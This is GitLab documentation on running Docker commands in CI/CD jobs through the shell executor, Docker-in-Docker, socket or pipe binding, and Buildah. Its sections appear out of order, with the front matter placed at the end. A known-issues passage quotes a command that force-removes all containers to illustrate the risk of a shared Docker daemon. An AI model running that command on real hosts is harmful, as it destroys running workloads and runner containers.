1. Add the `gitlab-runner` user to the `docker` group:

   ```shell
   sudo usermod -aG docker gitlab-runner
   ```

1. Verify that `gitlab-runner` has access to Docker:

   ```shell
   sudo -u gitlab-runner -H docker info
   ```
1. In GitLab, add `docker info` to `.gitlab-ci.yml` to verify that Docker is working:

   ```yaml
   default:
     before_script:
       - docker info

   build_image:
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

You can now use `docker` commands (and install Docker Compose if needed).

When you add `gitlab-runner` to the `docker` group, you effectively grant `gitlab-runner` full
root permissions. For more information, see
[security of the `docker` group](https://blog.zopyx.com/on-docker-security-docker-group-considered-harmful/).

### Use Docker-in-Docker

"Docker-in-Docker" (`dind`) means:

- Your registered runner uses the
  [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) or the
  [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/).
- The executor uses a [container image of Docker](https://hub.docker.com/_/docker/), provided by
  Docker, to run your CI/CD jobs.

The Docker image includes all of the `docker` tools and can run the job script in context of the
image in privileged mode.

You should use Docker-in-Docker with TLS enabled, which is supported by
[GitLab.com instance runners](../runners/_index.md).

You should always pin a specific version of the image, like `docker:24.0.5`. If you use a tag
like `docker:latest`, you have no control over which version is used. This can cause
incompatibility problems when new versions are released.

#### Use the Docker executor with Docker-in-Docker

You can use the Docker executor to run jobs in a Docker container.

##### Docker-in-Docker with TLS enabled in the Docker executor

The Docker daemon supports connections over TLS. TLS is the default in Docker 19.03.12 and later.

{{< alert type="warning" >}}

This task enables `--docker-privileged`, which effectively disables the container's security
mechanisms and exposes your host to privilege escalation. This action can cause container breakout.
For more information, see
[runtime privilege and Linux capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities).

{{< /alert >}}

To use Docker-in-Docker with TLS enabled:

1. Install [GitLab Runner](https://docs.gitlab.com/runner/install/).
1. Register GitLab Runner from the command line. Use `docker` and `privileged` mode:

   ```shell
   sudo gitlab-runner register -n \
     --url "https://gitlab.com/" \
     --registration-token REGISTRATION_TOKEN \
     --executor docker \
     --description "My Docker Runner" \
     --tag-list "tls-docker-runner" \
     --docker-image "docker:24.0.5" \
     --docker-privileged \
     --docker-volumes "/certs/client"
   ```

   - This command registers a new runner to use the `docker:24.0.5` image (if none is specified at
     the job level). To start the build and service containers, it uses the `privileged` mode. If
     you want to use Docker-in-Docker, you must always use `privileged = true` in your Docker
     containers.
   - This command mounts `/certs/client` for the service and build container, which is needed for
     the Docker client to use the certificates in that directory. For more information, see
     [the Docker image documentation](https://hub.docker.com/_/docker/).

   The previous command creates a `config.toml` entry similar to the following example:

   ```toml
   [[runners]]
     url = "https://gitlab.com/"
     token = TOKEN
     executor = "docker"
     [runners.docker]
       tls_verify = false
       image = "docker:24.0.5"
       privileged = true
       disable_cache = false
       volumes = ["/certs/client", "/cache"]
     [runners.cache]
       [runners.cache.s3]
       [runners.cache.gcs]
   ```

1. You can now use `docker` in the job script. You should include the `docker:24.0.5-dind`
   service:

   ```yaml
   default:
     image: docker:24.0.5
     services:
       - docker:24.0.5-dind
     before_script:
       - docker info

   variables:
     # When you use the dind service, you must instruct Docker to talk with
     # the daemon started inside of the service. The daemon is available
     # with a network connection instead of the default
     # /var/run/docker.sock socket.
     # Docker 19.03 does this automatically
     # by setting the DOCKER_HOST in
     # https://github.com/docker-library/docker/blob/d45051476babc297257df490d22cbd806f1b11e4/19.03/docker-entrypoint.sh#L23-L29
     #
     # The 'docker' hostname is the alias of the service container as described at
     # https://docs.gitlab.com/ee/ci/services/#accessing-the-services.
     #
     # Specify to Docker where to create the certificates. Docker
     # creates them automatically on boot, and creates
     # `/certs/client` to share between the service and job
     # container, thanks to volume mount from config.toml
     DOCKER_TLS_CERTDIR: "/certs"

   build:
     stage: build
     tags:
       - tls-docker-runner
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

##### Use a Unix socket on a shared volume between Docker-in-Docker and build container

Directories defined in `volumes = ["/certs/client", "/cache"]` in the
[Docker-in-Docker with TLS enabled in the Docker executor](#docker-in-docker-with-tls-enabled-in-the-docker-executor)
approach are
[persistent between builds](https://docs.gitlab.com/runner/executors/docker.html#persistent-storage).

If multiple CI/CD jobs using a Docker executor runner have Docker-in-Docker services enabled,
then each job writes to the directory path. This approach might result in a conflict.

To address this conflict, use a Unix socket on a volume shared between the Docker-in-Docker
service and the build container. This approach improves performance and establishes a secure
connection between the service and client.

The following is a sample `config.toml` with a temporary volume shared between build and service
containers:

```toml
[[runners]]
  url = "https://gitlab.com/"
  token = TOKEN
  executor = "docker"
  [runners.docker]
    image = "docker:24.0.5"
    privileged = true
    volumes = ["/runner/services/docker"] # Temporary volume shared between build and service containers.
```

The Docker-in-Docker service creates a `docker.sock`.
The Docker client connects to `docker.sock` through a Docker Unix socket volume.

```yaml
job:
  variables:
    # This variable is shared by both the DinD service and the Docker client.
    # For the service, it instructs DinD to create `docker.sock` here.
    # For the client, it tells the Docker client which Docker Unix socket to connect to.
    DOCKER_HOST: "unix:///runner/services/docker/docker.sock"
  services:
    - docker:24.0.5-dind
  image: docker:24.0.5
  script:
    - docker version
```

##### Docker-in-Docker with TLS disabled in the Docker executor

Sometimes there are legitimate reasons to disable TLS. For example, you have no control over the
GitLab Runner configuration that you are using.

1. Register GitLab Runner from the command line. Use `docker` and `privileged` mode:

   ```shell
   sudo gitlab-runner register -n \
     --url "https://gitlab.com/" \
     --registration-token REGISTRATION_TOKEN \
     --executor docker \
     --description "My Docker Runner" \
     --tag-list "no-tls-docker-runner" \
     --docker-image "docker:24.0.5" \
     --docker-privileged
   ```

   The previous command creates a `config.toml` entry similar to the following example:

   ```toml
   [[runners]]
     url = "https://gitlab.com/"
     token = TOKEN
     executor = "docker"
     [runners.docker]
       tls_verify = false
       image = "docker:24.0.5"
       privileged = true
       disable_cache = false
       volumes = ["/cache"]
     [runners.cache]
       [runners.cache.s3]
       [runners.cache.gcs]
   ```

1. Include the `docker:24.0.5-dind` service in the job script:

   ```yaml
   default:
     image: docker:24.0.5
     services:
       - docker:24.0.5-dind
     before_script:
       - docker info

   variables:
     # When using the dind service, you must instruct docker to talk with the
     # daemon started inside of the service. The daemon is available with
     # a network connection instead of the default /var/run/docker.sock socket.
     #
     # The 'docker' hostname is the alias of the service container as described at
     # https://docs.gitlab.com/ee/ci/docker/using_docker_images.html#accessing-the-services
     #
     DOCKER_HOST: tcp://docker:2375
     #
     # This instructs Docker not to start over TLS.
     DOCKER_TLS_CERTDIR: ""

   build:
     stage: build
     tags:
       - no-tls-docker-runner
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

##### Docker-in-Docker with proxy enabled in the Docker executor

You might need to configure proxy settings to use the `docker push` command. For more
information, see
[Proxy settings when using dind service](https://docs.gitlab.com/runner/configuration/proxy.html#proxy-settings-when-using-dind-service).

#### Use the Kubernetes executor with Docker-in-Docker

You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/) to
run jobs in a Docker container.

##### Docker-in-Docker with TLS enabled in Kubernetes

To use Docker-in-Docker with TLS enabled in Kubernetes:

1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the
   [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137)
   to specify a volume mount.

   ```yaml
   runners:
     tags: "tls-dind-kubernetes-runner"
     config: |
       [[runners]]
         [runners.kubernetes]
           image = "ubuntu:20.04"
           privileged = true
         [[runners.kubernetes.volumes.empty_dir]]
           name = "docker-certs"
           mount_path = "/certs/client"
           medium = "Memory"
   ```

1. Include the `docker:24.0.5-dind` service in the job:

   ```yaml
   default:
     image: docker:24.0.5
     services:
       - name: docker:24.0.5-dind
         variables:
           HEALTHCHECK_TCP_PORT: "2376"
     before_script:
       - docker info

   variables:
     # When using the dind service, you must instruct Docker to talk with
     # the daemon started inside of the service. The daemon is available
     # with a network connection instead of the default
     # /var/run/docker.sock socket.
     DOCKER_HOST: tcp://docker:2376
     #
     # The 'docker' hostname is the alias of the service container as described at
     # https://docs.gitlab.com/ee/ci/services/#accessing-the-services.
     #
     # Specify to Docker where to create the certificates. Docker
     # creates them automatically on boot, and creates
     # `/certs/client` to share between the service and job
     # container, thanks to volume mount from config.toml
     DOCKER_TLS_CERTDIR: "/certs"
     # These are usually specified by the entrypoint, however the
     # Kubernetes executor doesn't run entrypoints
     # https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4125
     DOCKER_TLS_VERIFY: 1
     DOCKER_CERT_PATH: "$DOCKER_TLS_CERTDIR/client"

   build:
     stage: build
     tags:
       - tls-dind-kubernetes-runner
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

##### Docker-in-Docker with TLS disabled in Kubernetes

To use Docker-in-Docker with TLS disabled in Kubernetes, you must adapt the previous example to:

- Remove the `[[runners.kubernetes.volumes.empty_dir]]` section from the `values.yml` file.
- Change the port from `2376` to `2375` with `DOCKER_HOST: tcp://docker:2375`.
- Instruct Docker to start with TLS disabled with `DOCKER_TLS_CERTDIR: ""`.

For example:

1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the
   [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137):

   ```yaml
   runners:
     tags: "no-tls-dind-kubernetes-runner"
     config: |
       [[runners]]
         [runners.kubernetes]
           image = "ubuntu:20.04"
           privileged = true
   ```

1. You can now use `docker` in the job script. You should include the `docker:24.0.5-dind`
   service:

   ```yaml
   default:
     image: docker:24.0.5
     services:
       - name: docker:24.0.5-dind
         variables:
           HEALTHCHECK_TCP_PORT: "2375"
     before_script:
       - docker info

   variables:
     # When using the dind service, you must instruct Docker to talk with
     # the daemon started inside of the service.
     # The daemon is available
     # with a network connection instead of the default
     # /var/run/docker.sock socket.
     DOCKER_HOST: tcp://docker:2375
     #
     # The 'docker' hostname is the alias of the service container as described at
     # https://docs.gitlab.com/ee/ci/services/#accessing-the-services.
     #
     # This instructs Docker not to start over TLS.
     DOCKER_TLS_CERTDIR: ""

   build:
     stage: build
     tags:
       - no-tls-dind-kubernetes-runner
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

#### Known issues with Docker-in-Docker

Docker-in-Docker is the recommended configuration, but you should be aware of the following
issues:

- **The `docker-compose` command**: This command is not available in this configuration by
  default. To use `docker-compose` in your job scripts, follow the Docker Compose
  [installation instructions](https://docs.docker.com/compose/install/).
- **Cache**: Each job runs in a new environment. Because every build gets its own instance of the
  Docker engine, concurrent jobs do not cause conflicts. However, jobs can be slower because
  there's no caching of layers. See
  [Docker layer caching](#make-docker-in-docker-builds-faster-with-docker-layer-caching).
- **Storage drivers**: By default, earlier versions of Docker use the `vfs` storage driver, which
  copies the file system for each job. Docker 17.09 and later use `--storage-driver overlay2`,
  which is the recommended storage driver. See
  [Using the OverlayFS driver](#use-the-overlayfs-driver) for details.
- **Root file system**: Because the `docker:24.0.5-dind` container and the runner container do
  not share their root file system, you can use the job's working directory as a mount point for
  child containers. For example, if you have files you want to share with a child container, you
  could create a subdirectory under `/builds/$CI_PROJECT_PATH` and use it as your mount point.
  For a more detailed explanation, see
  [issue #41227](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41227).
  ```yaml
  variables:
    MOUNT_POINT: /builds/$CI_PROJECT_PATH/mnt
  script:
    - mkdir -p "$MOUNT_POINT"
    - docker run -v "$MOUNT_POINT:/mnt" my-docker-image
  ```

### Use Docker socket binding

To use Docker commands in your CI/CD jobs, you can bind-mount `/var/run/docker.sock` into the
build container. Docker is then available in the context of the image.

If you bind the Docker socket, you can't use `docker:24.0.5-dind` as a service. Volume bindings
also affect services, making them incompatible.

#### Use the Docker executor with Docker socket binding

To mount the Docker socket with the Docker executor, add
`"/var/run/docker.sock:/var/run/docker.sock"` to the
[Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section).

1. To mount `/var/run/docker.sock` while registering your runner, include the following options:

   ```shell
   sudo gitlab-runner register \
     --non-interactive \
     --url "https://gitlab.com/" \
     --registration-token REGISTRATION_TOKEN \
     --executor "docker" \
     --description "docker-runner" \
     --tag-list "socket-binding-docker-runner" \
     --docker-image "docker:24.0.5" \
     --docker-volumes "/var/run/docker.sock:/var/run/docker.sock"
   ```

   The previous command creates a `config.toml` entry similar to the following example:

   ```toml
   [[runners]]
     url = "https://gitlab.com/"
     token = RUNNER_TOKEN
     executor = "docker"
     [runners.docker]
       tls_verify = false
       image = "docker:24.0.5"
       privileged = false
       disable_cache = false
       volumes = ["/var/run/docker.sock:/var/run/docker.sock", "/cache"]
     [runners.cache]
       Insecure = false
   ```

1. Use Docker in the job script:

   ```yaml
   default:
     image: docker:24.0.5
     before_script:
       - docker info

   build:
     stage: build
     tags:
       - socket-binding-docker-runner
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

#### Use the Kubernetes executor with Docker socket binding

To mount the Docker socket with the Kubernetes executor, add `"/var/run/docker.sock"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume).

1. To specify a volume mount, update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html).

   ```yaml
   runners:
     tags: "socket-binding-kubernetes-runner"
     config: |
       [[runners]]
         [runners.kubernetes]
           image = "ubuntu:20.04"
           privileged = false
           [[runners.kubernetes.volumes.host_path]]
             host_path = '/var/run/docker.sock'
             mount_path = '/var/run/docker.sock'
             name = 'docker-sock'
             read_only = true
   ```

1. Use Docker in the job script:

   ```yaml
   default:
     image: docker:24.0.5

     before_script:
       - docker info

   build:
     stage: build
     tags:
       - socket-binding-kubernetes-runner
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

#### Known issues with Docker socket binding

When you use Docker socket binding, you avoid running Docker in privileged mode. However, this method has the following implications:

- When you share the Docker daemon, you effectively disable the container's security mechanisms and expose your host to privilege escalation. This can cause container breakout. For example, if a project runs `docker rm -f $(docker ps -a -q)`, it removes the GitLab Runner containers.
- Concurrent jobs might not work. If your tests create containers with specific names, they might conflict with each other.
- Any containers created by Docker commands are siblings of the runner, rather than children of the runner. This might cause complications for your workflow.
- Sharing files and directories from the source repository into containers might not work as expected. Volume mounting is done in the context of the host machine, not the build container. For example: ```shell docker run --rm -t -i -v $(pwd)/src:/home/app/src test-image:latest run_app_tests ``` You do not need to include the `docker:24.0.5-dind` service, like you do when you use the Docker-in-Docker executor: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` For complex Docker-in-Docker setups like [Code Quality scanning using CodeClimate](../testing/code_quality_codeclimate_scanning.md), you must match host and container paths for proper execution. For more details, see [Use private runners for CodeClimate-based scanning](../testing/code_quality_codeclimate_scanning.md#use-private-runners). ### Use Docker pipe binding Windows Containers run Windows executables compiled for the Windows Server kernel and userland (either windowsservercore or nanoserver). To build and run Windows containers, a Windows system with container support is required. For more information, see [Windows Containers](https://learn.microsoft.com/en-us/virtualization/windowscontainers/). To use Docker pipe binding, you must install and run a Docker Engine on the host Windows Server operating system. For more information, see [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1). To use Docker commands in your Windows-based container CI/CD jobs, you can bind-mount `\\.\pipe\docker_engine` into the launched executor container. Docker is then available in the context of the image. 
The [Docker pipe binding in Windows](#use-docker-pipe-binding) is similar to the [Docker socket binding in Linux](#use-docker-socket-binding), and it has similar [known issues](#known-issues-with-docker-pipe-binding) to the [known issues with Docker socket binding](#known-issues-with-docker-socket-binding).

Docker pipe binding requires a Docker Engine installed and running on the host Windows Server operating system. See [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-2).

#### Use the Docker executor with Docker pipe binding

You can use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) to run jobs in a Windows-based container.

To mount the Docker pipe with the Docker executor, add `"\\.\pipe\docker_engine:\\.\pipe\docker_engine"` to the [Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section).

1. To mount `\\.\pipe\docker_engine` while registering your runner, include the following options:

   ```powershell
   .\gitlab-runner.exe register `
     --non-interactive `
     --url "https://gitlab.com/" `
     --registration-token REGISTRATION_TOKEN `
     --executor "docker-windows" `
     --description "docker-windows-runner" `
     --tag-list "docker-windows-runner" `
     --docker-image "docker:25-windowsservercore-ltsc2022" `
     --docker-volumes "\\.\pipe\docker_engine:\\.\pipe\docker_engine"
   ```

   The previous command creates a `config.toml` entry similar to the following example:

   ```toml
   [[runners]]
     url = "https://gitlab.com/"
     token = RUNNER_TOKEN
     executor = "docker-windows"
     [runners.docker]
       tls_verify = false
       image = "docker:25-windowsservercore-ltsc2022"
       privileged = false
       disable_cache = false
       volumes = ["\\.\pipe\docker_engine:\\.\pipe\docker_engine"]
     [runners.cache]
       Insecure = false
   ```

1.
Use Docker in the job script:

   ```yaml
   default:
     image: docker:25-windowsservercore-ltsc2022

     before_script:
       - docker version
       - docker info

   build:
     stage: build
     tags:
       - docker-windows-runner
     script:
       - docker build -t my-docker-image .
       - docker run my-docker-image /script/to/run/tests
   ```

#### Use the Kubernetes executor with Docker pipe binding

You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes.html) to run jobs in a Windows-based container.

To use the Kubernetes executor for Windows-based containers, you must include Windows nodes in your Kubernetes cluster. For more information, see [Windows containers in Kubernetes](https://kubernetes.io/docs/concepts/windows/intro/). You can use a [runner operating in a Linux environment but targeting Windows nodes](https://docs.gitlab.com/runner/executors/kubernetes/#example-for-windowsamd64).

To mount the Docker pipe with the Kubernetes executor, add `"\\.\pipe\docker_engine"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume).

1. To specify a volume mount, update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html).

   ```yaml
   runners:
     tags: "kubernetes-windows-runner"
     config: |
       [[runners]]
         executor = "kubernetes"
         # The FF_USE_POWERSHELL_PATH_RESOLVER feature flag has to be enabled for PowerShell
         # to resolve paths for Windows correctly when Runner is operating in a Linux environment
         # but targeting Windows nodes.
[runners.feature_flags] FF_USE_POWERSHELL_PATH_RESOLVER = true [runners.kubernetes] [[runners.kubernetes.volumes.host_path]] host_path = '\\.\pipe\docker_engine' mount_path = '\\.\pipe\docker_engine' name = 'docker-pipe' read_only = true [runners.kubernetes.node_selector] "kubernetes.io/arch" = "amd64" "kubernetes.io/os" = "windows" "node.kubernetes.io/windows-build" = "10.0.20348" ``` 1. Use Docker in the job script: ```yaml default: image: docker:25-windowsservercore-ltsc2022 before_script: - docker version - docker info build: stage: build tags: - kubernetes-windows-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Known issues with AWS EKS Kubernetes cluster When you migrate from `dockerd` to `containerd`, the AWS EKS bootstrapping script `Start-EKSBootstrap.ps1` stops and disables the Docker Service. To work around this issue, rename the Docker Service after you [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1) with this script: ```powershell Write-Output "Rename the just installed Docker Engine Service from docker to dockerd" Write-Output "because the Start-EKSBootstrap.ps1 stops and disables the docker Service as part of migration from dockerd to containerd" Stop-Service -Name docker dockerd --register-service --service-name dockerd Start-Service -Name dockerd Write-Output "Ready to do Docker pipe binding on Windows EKS Node! :-)" ``` #### Known issues with Docker pipe binding Docker pipe binding has the same set of security and isolation issues as the [Known issues with Docker socket binding](#known-issues-with-docker-socket-binding). ## Enable registry mirror for `docker:dind` service When the Docker daemon starts inside the service container, it uses the default configuration. 
You might want to configure a [registry mirror](https://docs.docker.com/docker-hub/mirror/) for performance improvements and to ensure you do not exceed Docker Hub rate limits. ### The service in the `.gitlab-ci.yml` file You can append extra CLI flags to the `dind` service to set the registry mirror: ```yaml services: - name: docker:24.0.5-dind command: ["--registry-mirror", "https://registry-mirror.example.com"] # Specify the registry mirror to use ``` ### The service in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can specify the `command` to configure the registry mirror for the Docker daemon. The `dind` service must be defined for the [Docker](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runnersdockerservices-section) or [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#define-a-list-of-services). Docker: ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true [[runners.docker.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` Kubernetes: ```toml [[runners]] ... name = "kubernetes" [runners.kubernetes] ... privileged = true [[runners.kubernetes.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` ### The Docker executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [volume mount](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). 
For example, if you have a `/opt/docker/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This mounts the file for **every** container created by GitLab Runner. The configuration is detected by the `dind` service. ```toml [[runners]] ... executor = "docker" [runners.docker] image = "alpine:3.12" privileged = true volumes = ["/opt/docker/daemon.json:/etc/docker/daemon.json:ro"] ``` ### The Kubernetes executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [ConfigMap volume mount](https://docs.gitlab.com/runner/executors/kubernetes/#configmap-volume). For example, if you have a `/tmp/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. You can do this with a command like: ```shell kubectl create configmap docker-daemon --namespace gitlab-runner --from-file /tmp/daemon.json ``` {{< alert type="note" >}} You must use the namespace that the Kubernetes executor for GitLab Runner uses to create job pods. {{< /alert >}} After the ConfigMap is created, you can update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This update mounts the file for **every** container created by GitLab Runner. The `dind` service detects this configuration. ```toml [[runners]] ... 
executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "docker-daemon" mount_path = "/etc/docker/daemon.json" sub_path = "daemon.json" ``` ## Authenticate with registry in Docker-in-Docker When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service. You should [authenticate with registry](authenticate_registry.md). ## Make Docker-in-Docker builds faster with Docker layer caching When using Docker-in-Docker, Docker downloads all layers of your image every time you create a build. You can [make your builds faster with Docker layer caching](docker_layer_caching.md). ## Use the OverlayFS driver {{< alert type="note" >}} The instance runners on GitLab.com use the `overlay2` driver by default. {{< /alert >}} By default, when using `docker:dind`, Docker uses the `vfs` storage driver, which copies the file system on every run. You can avoid this disk-intensive operation by using a different driver, for example `overlay2`. ### Requirements 1. Ensure a recent kernel is used, preferably `>= 4.2`. 1. Check whether the `overlay` module is loaded: ```shell sudo lsmod | grep overlay ``` If you see no result, then the module is not loaded. To load the module, use: ```shell sudo modprobe overlay ``` If the module loaded, you must make sure the module loads on reboot. 
On Ubuntu systems, do this by adding the following line to `/etc/modules`: ```plaintext overlay ``` ### Use the OverlayFS driver per project You can enable the driver for each project individually by using the `DOCKER_DRIVER` [CI/CD variable](../yaml/_index.md#variables) in `.gitlab-ci.yml`: ```yaml variables: DOCKER_DRIVER: overlay2 ``` ### Use the OverlayFS driver for every project If you use your own [runners](https://docs.gitlab.com/runner/), you can enable the driver for every project by setting the `DOCKER_DRIVER` environment variable in the [`[[runners]]` section of the `config.toml` file](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section): ```toml environment = ["DOCKER_DRIVER=overlay2"] ``` If you're running multiple runners, you must modify all configuration files. Read more about the [runner configuration](https://docs.gitlab.com/runner/configuration/) and [using the OverlayFS storage driver](https://docs.docker.com/storage/storagedriver/overlayfs-driver/). ## Docker alternatives You can build container images without enabling privileged mode on your runner: - [BuildKit](using_buildkit.md): Includes rootless BuildKit options that eliminate Docker daemon dependency. - [Buildah](#buildah-example): Build OCI-compliant images without requiring a Docker daemon. ### Buildah example To use Buildah with GitLab CI/CD, you need [a runner](https://docs.gitlab.com/runner/) with one of the following executors: - [Kubernetes](https://docs.gitlab.com/runner/executors/kubernetes/). - [Docker](https://docs.gitlab.com/runner/executors/docker.html). - [Docker Machine](https://docs.gitlab.com/runner/executors/docker_machine.html). In this example, you use Buildah to: 1. Build a Docker image. 1. Push it to [GitLab container registry](../../user/packages/container_registry/_index.md). In the last step, Buildah uses the `Dockerfile` under the root directory of the project to build the Docker image. 
Finally, it pushes the image to the project's container registry: ```yaml build: stage: build image: quay.io/buildah/stable variables: # Use vfs with buildah. Docker offers overlayfs as a default, but Buildah # cannot stack overlayfs on top of another overlayfs filesystem. STORAGE_DRIVER: vfs # Write all image metadata in the docker format, not the standard OCI format. # Newer versions of docker can handle the OCI format, but older versions, like # the one shipped with Fedora 30, cannot handle the format. BUILDAH_FORMAT: docker FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE/test" before_script: # GitLab container registry credentials taken from the # [predefined CI/CD variables](../variables/_index.md#predefined-cicd-variables) # to authenticate to the registry. - echo "$CI_REGISTRY_PASSWORD" | buildah login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY script: - buildah images - buildah build -t $FQ_IMAGE_NAME - buildah images - buildah push $FQ_IMAGE_NAME ``` If you are using GitLab Runner Operator deployed to an OpenShift cluster, try the [tutorial for using Buildah to build images in rootless container](buildah_rootless_tutorial.md). ## Use the GitLab container registry After you've built a Docker image, you can push it to the [GitLab container registry](../../user/packages/container_registry/build_and_push_images.md#use-gitlab-cicd). ## Troubleshooting ### `open //./pipe/docker_engine: The system cannot find the file specified` The following error might appear when you run a `docker` command in the PowerShell script to access the mounted Docker pipe: ```powershell PS C:\> docker version Client: Version: 25.0.5 API version: 1.44 Go version: go1.21.8 Git commit: 5dc9bcc Built: Tue Mar 19 15:06:12 2024 OS/Arch: windows/amd64 Context: default error during connect: this error may indicate that the docker daemon is not running: Get "http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.44/version": open //./pipe/docker_engine: The system cannot find the file specified. 
```

The error indicates that the Docker Engine is not running on the Windows EKS node, and therefore the Docker pipe binding cannot be used in the Windows-based executor container. To solve the problem, use the workaround described in [Use the Kubernetes executor with Docker pipe binding](#use-the-kubernetes-executor-with-docker-pipe-binding).
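Before applying the workaround, you can confirm from inside a job whether the pipe was mounted at all. The following job is a sketch, not part of the official configuration: it reuses the `docker-windows-runner` tag and image from the examples on this page, and fails fast with a clearer message when the pipe is missing.

```yaml
check_docker_pipe:
  image: docker:25-windowsservercore-ltsc2022
  tags:
    - docker-windows-runner
  script:
    # Named pipes are visible to Test-Path. If the pipe is absent, either the
    # Docker Engine is not running on the host or the volume was not mounted.
    - if (-not (Test-Path '\\.\pipe\docker_engine')) { throw 'Docker pipe is not mounted; check the runner volumes configuration.' }
    - docker info
```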
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use Docker to build Docker images breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can use GitLab CI/CD with Docker to create Docker images. For example, you can create a Docker image of your application, test it, and push it to a container registry. To run Docker commands in your CI/CD jobs, you must configure GitLab Runner to support `docker` commands. This method requires `privileged` mode. If you want to build Docker images without enabling `privileged` mode on the runner, you can use a [Docker alternative](#docker-alternatives). ## Enable Docker commands in your CI/CD jobs To enable Docker commands for your CI/CD jobs, you can use: - [The shell executor](#use-the-shell-executor) - [Docker-in-Docker](#use-docker-in-docker) - [Docker socket binding](#use-docker-socket-binding) - [Docker pipe binding](#use-docker-pipe-binding) ### Use the shell executor To include Docker commands in your CI/CD jobs, you can configure your runner to use the `shell` executor. In this configuration, the `gitlab-runner` user runs the Docker commands, but needs permission to do so. 1. [Install](https://gitlab.com/gitlab-org/gitlab-runner/#installation) GitLab Runner. 1. [Register](https://docs.gitlab.com/runner/register/) a runner. Select the `shell` executor. For example: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor shell \ --description "My Runner" ``` 1. On the server where GitLab Runner is installed, install Docker Engine. View a list of [supported platforms](https://docs.docker.com/engine/install/). 1. 
